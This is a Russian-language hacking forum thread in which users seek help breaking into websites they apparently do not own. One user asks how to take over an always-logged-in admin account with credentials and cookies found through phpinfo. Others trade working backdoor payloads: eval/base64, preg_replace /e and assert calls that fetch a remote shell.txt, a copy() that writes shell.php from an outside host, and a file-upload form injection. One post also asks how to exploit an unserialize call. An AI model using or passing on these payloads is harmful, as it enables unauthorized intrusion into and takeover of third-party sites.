Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. zloy_fantom

    zloy_fantom New Member

    Joined:
    3 Dec 2012
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    Нарыл на сайте спрятанный пхпинфо, а в нем пасс и логин админа, только админ залогинен круглосуточно, а сайт не позволяет залогиниться с разных ип одному юзеру. Как это можно обойти?
     
  2. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,186
    Likes Received:
    618
    Reputations:
    690
    в phpinfo логин и пасс ? 0_о
     
    _________________________
  3. zloy_fantom

    zloy_fantom New Member

    Joined:
    3 Dec 2012
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    Как в том анекдоте про говорящую корову: "Че смотришь? Я сама охуела".
    НО, как я уже сказал, залогиниться под ним не могу. Там-же, кстати еще и куки прописаны, но подставлять пока не пробовал, к тому-же не понятно, админские они или нет, и не залочит-ли их сервер с другого ип, как лочит авторизацию...
    Помогите советом
     
  4. zloy_fantom

    zloy_fantom New Member

    Joined:
    3 Dec 2012
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    Подскажите, это:
    passhash=md5(concat(salt,concat(" . sqlesc($password) . ",salt)))
    означает
    md5(md5(salt.pass.salt))
    или
    md5(md5(salt.md5(pass).salt))
    Или нет?
     
  5. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    md5(salt.password.salt)
     
    _________________________
  6. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Чё за бред ? Быть такого не может...
     
    _________________________
  7. sova1611

    sova1611 New Member

    Joined:
    10 Jan 2009
    Messages:
    30
    Likes Received:
    3
    Reputations:
    0
    короче имеем бэкдор,заходил раньше через ?e=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3NpdGUucnUvc2hlbGwudHh0JykpOw)); (код base64 изменил),саты переехали на другой серв,сейчас быкдор так же есть ,проверял через ?e=phpinfo(); ,но уже в шел не попадаю(так каак стоит disable_functions
    PHP:
    eval, execsystempassthruscandirpopenshell_execproc_openproc_closeproc_niceget_current_usergetmyuidposix_getpwuidapache_get_modulesvirtualposix_getgrgidgetmyinodefileownerfilegroupgetmypidapache_get_versionapache_getenvapache_noteapache_setenvdisk_free_spacediskfreespacedlini_restoreopenlogsysloghighlight_fileshow_sourcesymlinkdisk_total_spaceini_get_allget_current_userposix_uname
    тоесть eval отключён( как теперь можно попасть в шел)
     
  8. zloy_fantom

    zloy_fantom New Member

    Joined:
    3 Dec 2012
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    Поверьте, там есть данные:
    [​IMG]
     
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Попробуй так:
    ?e=preg_replace("/.*/e","phpinfo();",".");

    P.S: Как такавой функция preg_*(); может полностью вам заменить eval(); вам остается только синтаксис разобрать!
     
    _________________________
    #22049 winstrool, 4 Apr 2013
    Last edited: 4 Apr 2013
  10. sova1611

    sova1611 New Member

    Joined:
    10 Jan 2009
    Messages:
    30
    Likes Received:
    3
    Reputations:
    0
    выдало Hacking attempt! а на другом бэкдоре выдало phpinfo

    а вот ?e=preg_replace("/.*/e","file_get_contents('http://site.ru/2.txt');",".");


    не обработало ни на одном(
     
    #22050 sova1611, 4 Apr 2013
    Last edited: 5 Apr 2013
  11. sova1611

    sova1611 New Member

    Joined:
    10 Jan 2009
    Messages:
    30
    Likes Received:
    3
    Reputations:
    0
    это твои куки)))
     
  12. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    45
    Likes Received:
    42
    Reputations:
    48
    Я тебе открою страшную хакерскую тайну, только никому не говори!

    Админ там мудак. Таким образом eval не отключается, тоесть ей пофиг эта директива, а почему так, можно будет узнать если кушать манную кашу и читать хоть что то по теме, а не давать советы (постоянно не в тему, прошу заметить ))).
     
  13. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,186
    Likes Received:
    618
    Reputations:
    690
    ага и такое бывает http://forums.devshed.com/php-development-5/phpinfo-shows-my-password-246249.html
    ты же залогинен на сайте именно под этим логин пассом так ? или там вместо пасса хеш сумма.
    P.S или это кривость рук админа с настройками вебпанелей, в любом случае такого не должно быть и это не правильно.
     
    _________________________
    #22053 shell_c0de, 5 Apr 2013
    Last edited: 5 Apr 2013
  14. zloy_fantom

    zloy_fantom New Member

    Joined:
    3 Dec 2012
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    В общем все было несколько иначе, просто я, когда писал, решил упростить.
    Я прочитал скрипт memcache.php, в котором были логин и пасс в явном виде, потом запустил его, скрипт затребовал авторизацию, я ввел данные и просмотрел предложенные данные, ничего интересного не нашел, открыл индекс, он показал мне, что я не сервере НЕ ЗАЛОГИНЕН, т.е. авторизация к memcache.php происходит в обход базы данных (тупо сравниваются введенные данные со строкой в скрипте). После этого я открыл пхп инфо, согласен, скорее всего куки, логин и пасс перешли туда из моей сессии. Попозже проведу более чистый эксперимент. Куда копать понял.
    Но что мне делать с этим админом, который постоянно залогинен, ведь я даже не знаю, совпадает-ли этот пароль с паролем от сайта....
     
  15. sova1611

    sova1611 New Member

    Joined:
    10 Jan 2009
    Messages:
    30
    Likes Received:
    3
    Reputations:
    0
    как я понял решения под мою проблему нет?фильтрует dle кавычки(
     
    #22055 sova1611, 5 Apr 2013
    Last edited: 5 Apr 2013
  16. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    Что за люди ленивые пошли я в ах**у,ты пока флудил тут уже решение нашел бы.У тебя ограничения мизерные вариантов море как залиться.
    Исполнял аплоадеры который запросто залазят а get-запрос,тебе выше сказали юзай preg_replace если не получается ей исполнить код читай ман по ней,юзай вместо eval функцию assert
     
  17. sova1611

    sova1611 New Member

    Joined:
    10 Jan 2009
    Messages:
    30
    Likes Received:
    3
    Reputations:
    0
    через preg_replace шел не заливается так как фильтруются кавычки,пробывал preg_replace("/.*/e","copy('http://site.ru/1.txt','shell.php');","."); ,проверял на другом всё норм,assert тоже не сработало(может не правильно составил запрос(

    print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form></form>

    тоже не помогло(
     
    #22057 sova1611, 5 Apr 2013
    Last edited: 5 Apr 2013
  18. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    Code:
    фильтруются кавычки,пробывал
    А preg_replace(base64_decode('')); религия не позволяет?

    Че там у тебя может не получиться?
    assert(file_get_contents('http://site/shell.txt'));
     
  19. m1d$

    m1d$ New Member

    Joined:
    30 Mar 2013
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    $terms = $input->request->get('highlight', null, 'base64');
    $terms = $terms ? unserialize(base64_decode($terms)) : null;
    как можно использовать в "своих" целях?
    файл highlight.php
     
  20. sova1611

    sova1611 New Member

    Joined:
    10 Jan 2009
    Messages:
    30
    Likes Received:
    3
    Reputations:
    0
    preg_replace(base64_decode(KCIvLiovZSIsInBocGluZm8oKTsiLCIuIik7)); не срабатывает(
     
Thread Status:
Not open for further replies.